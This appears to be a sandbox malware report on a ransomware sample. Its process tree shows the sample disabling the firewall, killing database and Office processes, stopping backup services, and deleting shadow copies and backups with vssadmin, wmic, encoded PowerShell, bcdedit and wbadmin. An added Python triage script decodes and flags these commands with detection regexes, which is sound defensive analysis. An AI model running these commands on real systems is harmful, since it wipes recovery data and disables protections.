Analysis

  • max time kernel
    62s
  • max time network
    66s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    22/07/2020, 08:54

General

  • Target

    Deniz_K_z_.bin.exe

  • Size

    3.4MB

  • MD5

    fc78e6e58352151fb77a4b92f239d381

  • SHA1

    4dda3af9601922394f0c16713180beb2ec88c050

  • SHA256

    c8d49d874454bf1fa50cb7e4c00677e028af38e1d22e41476634d5d5a349cd7e

  • SHA512

    4df0c69609087abc21be95574b6b09ff12253177a1dfee101ae7e24aa754d494fc837c41cfe636a686b644c9ebe7bf79fe805478ed75ee66a183208f7b3ca489

Malware Config

Signatures

  • UAC bypass 3 TTPs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Runs net.exe
  • Modifies service 2 TTPs 9 IoCs
  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Suspicious use of WriteProcessMemory 236 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Interacts with shadow copies 2 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • System policy modification 1 TTPs 17 IoCs
  • Kills process with taskkill 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe"
    1⤵
    • Checks whether UAC is enabled
    • Drops file in Drivers directory
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:824
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1412
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode disable
        3⤵
        • Modifies service
        PID:360
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
        3⤵
        • Interacts with shadow copies
        PID:1068
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:864
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
        3⤵
        • Interacts with shadow copies
        PID:1064
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:796
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im sql.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1184
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im winword.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:108
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im wordpad.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1064
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im outlook.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:824
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im thunderbird.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2036
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im oracle.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1868
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im excel.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:288
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im onenote.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1428
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im virtualboxvm.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2024
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im node.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1472
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im QBW32.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1992
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im WBGX.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1888
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im Teams.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1256
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im Flow.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1564
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1828
      • C:\Windows\SysWOW64\net.exe
        net stop DbxSvc
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1764
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop DbxSvc
          4⤵
          PID:1620
      • C:\Windows\SysWOW64\net.exe
        net stop OracleXETNSListener
        3⤵
        PID:1904
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop OracleXETNSListener
          4⤵
          PID:1916
      • C:\Windows\SysWOW64\net.exe
        net stop OracleServiceXE
        3⤵
        PID:1992
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop OracleServiceXE
          4⤵
          PID:1972
      • C:\Windows\SysWOW64\net.exe
        net stop AcrSch2Svc
        3⤵
        PID:828
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop AcrSch2Svc
          4⤵
          PID:2040
      • C:\Windows\SysWOW64\net.exe
        net stop AcronisAgent
        3⤵
        PID:1492
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop AcronisAgent
          4⤵
          PID:1072
      • C:\Windows\SysWOW64\net.exe
        net stop Apache2.4
        3⤵
        PID:1840
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop Apache2.4
          4⤵
          PID:1776
      • C:\Windows\SysWOW64\net.exe
        net stop SQLWriter
        3⤵
        PID:1644
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop SQLWriter
          4⤵
          PID:1596
      • C:\Windows\SysWOW64\net.exe
        net stop MSSQL$SQLEXPRESS
        3⤵
        PID:1764
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
          4⤵
          PID:1300
      • C:\Windows\SysWOW64\net.exe
        net stop MSSQLServerADHelper100
        3⤵
        PID:1892
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop MSSQLServerADHelper100
          4⤵
          PID:1948
      • C:\Windows\SysWOW64\net.exe
        net stop MongoDB
        3⤵
        PID:1896
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop MongoDB
          4⤵
          PID:1964
      • C:\Windows\SysWOW64\net.exe
        net stop SQLAgent$SQLEXPRESS
        3⤵
        PID:1080
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
          4⤵
          PID:1648
      • C:\Windows\SysWOW64\net.exe
        net stop SQLBrowser
        3⤵
        PID:1560
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop SQLBrowser
          4⤵
          PID:1608
      • C:\Windows\SysWOW64\net.exe
        net stop CobianBackup11
        3⤵
        PID:1576
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop CobianBackup11
          4⤵
          PID:1044
      • C:\Windows\SysWOW64\net.exe
        net stop cbVSCService11
        3⤵
        PID:1528
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop cbVSCService11
          4⤵
          PID:1772
      • C:\Windows\SysWOW64\net.exe
        net stop QBCFMontorService
        3⤵
        PID:1596
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop QBCFMontorService
          4⤵
          PID:1940
      • C:\Windows\SysWOW64\net.exe
        net stop QBVSS
        3⤵
        PID:792
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop QBVSS
          4⤵
          PID:1544
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1848
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1588
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1780
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1552
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1168
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1700

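Two mechanical steps a responder takes with a tree like this one: decode the `-e` argument of the PowerShell child (PowerShell expects base64 of UTF-16LE text, not UTF-8, which is why the payload decodes to garbage with a plain base64 tool), and classify each `cmd.exe /C` chain by the recovery-inhibiting or defense-evading primitive it runs. Note that the two `vssadmin resize shadowstorage` calls are not noise: shrinking the shadow storage cap below what the existing copies occupy makes Windows discard them, and the later `/maxsize=unbounded` only lifts the cap again. The Python below is an added example written for this page, not Tria.ge's signature code. The sample command lines are copied from the process tree above; the pattern table and the ATT&CK technique labels in it are this example's own assumed mapping, not the report's MITRE ATT&CK section.

```python
"""Triage helper for the recovery-inhibiting command chains in the tree above.

Added example for this page (not Tria.ge signature code). The sample command
lines are copied from the process tree; PATTERNS and its ATT&CK labels are
this example's own assumed mapping, not the report's MITRE section.
"""
import base64
import re
from typing import List, Optional, Tuple

# One regex per primitive, tested with re.search against a single command
# (after a `cmd /C a & b & c` chain has been split and path prefixes stripped).
PATTERNS = {
    "T1490 delete shadow copies (vssadmin)":
        re.compile(r"^vssadmin\s+delete\s+shadows", re.I),
    "T1490 delete shadow copies (wmic)":
        re.compile(r"^wmic\s+shadowcopy\s+delete", re.I),
    "T1490 delete shadow copies (Win32_Shadowcopy via PowerShell)":
        re.compile(r"Win32_Shadowcopy.*\.Delete\(", re.I),
    # Shrinking shadow storage below what the existing copies need makes Windows
    # discard them; the later /maxsize=unbounded only restores the cap, so it is
    # deliberately not matched.
    "T1490 shrink shadow storage (evicts existing copies)":
        re.compile(r"^vssadmin\s+resize\s+shadowstorage.*/maxsize=\d+[KMG]B", re.I),
    "T1490 disable boot recovery (bcdedit)":
        re.compile(r"^bcdedit\s+/set\s+\{default\}\s+"
                   r"(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I),
    "T1490 delete backup catalog/backups (wbadmin)":
        re.compile(r"^wbadmin\s+delete\s+(catalog|systemstatebackup|backup)\b", re.I),
    "T1562.004 disable host firewall (netsh)":
        re.compile(r"^netsh\s+(advfirewall|firewall)\s+set\s+.*(opmode\s+disable|state\s+off)", re.I),
    "T1489 stop service (net stop)":
        re.compile(r"^net1?\s+stop\s+\S+", re.I),
    "T1489 kill process (taskkill /f)":
        re.compile(r"^taskkill\s+.*/f\b", re.I),
}

# Longest alias first so "-enc" is not consumed as "-e" followed by junk.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
CMD_C = re.compile(r'cmd(?:\.exe)?"?\s+/c\s+(.*)$', re.I | re.S)
# Strips a quoted or bare drive-letter directory prefix from a command's first token.
LEADING_PATH = re.compile(r'^"?(?:[A-Za-z]:\\[^"\s]*\\)?([^"\s]+)"?')


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Plaintext of a `powershell -e/-enc/-EncodedCommand <b64>` argument, or None.
    PowerShell decodes the payload as UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def split_cmd_chain(cmdline: str) -> List[str]:
    """Split `cmd.exe /C a & b & c` into its commands, as cmd runs them one after
    another (a single & does not stop on failure), and drop the directory prefix
    from each command's first token so a full net1 path reads as `net1 stop X`."""
    m = CMD_C.search(cmdline)
    body = m.group(1) if m else cmdline
    parts = [p.strip() for p in re.split(r"\s*&&?\s*", body)]
    return [LEADING_PATH.sub(r"\1", p) for p in parts if p]


def classify(cmdline: str) -> List[Tuple[str, str]]:
    """(label, command) for every primitive in one process command line.
    An encoded PowerShell payload is decoded first so the WMI deletion is visible."""
    findings = []
    for cmd in split_cmd_chain(cmdline):
        text = decode_encoded_command(cmd) or cmd
        for label, rx in PATTERNS.items():
            if rx.search(text):
                findings.append((label, text))
    return findings


# Constructed sample: cmd.exe command lines copied from the process tree above.
ENCODED = "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable',
    r'"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB',
    r'"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded',
    r'"C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop SQLWriter & net stop MSSQL$SQLEXPRESS',
    r'"C:\Windows\System32\cmd.exe" /C powershell.exe -e ' + ENCODED,
    r'"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete'
    r' & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no'
    r' & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup'
    r' & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup',
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(line[:70] + ("..." if len(line) > 70 else ""))
        for label, cmd in classify(line) or [("no match", "-")]:
            print(f"    {label:60s} {cmd}")
```

Run it as-is to see the decoded WMI one-liner and the per-chain findings; in practice the same `classify` is fed process-creation command lines (Sysmon event 1, or a sandbox tree export) rather than the embedded sample. The `net stop` list and the `taskkill` list are the pre-encryption step that unlocks database and backup-agent files, so on a real host a single chain matching both T1489 and T1490 primitives within seconds is the point at which to isolate.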
Network

MITRE ATT&CK Enterprise v6
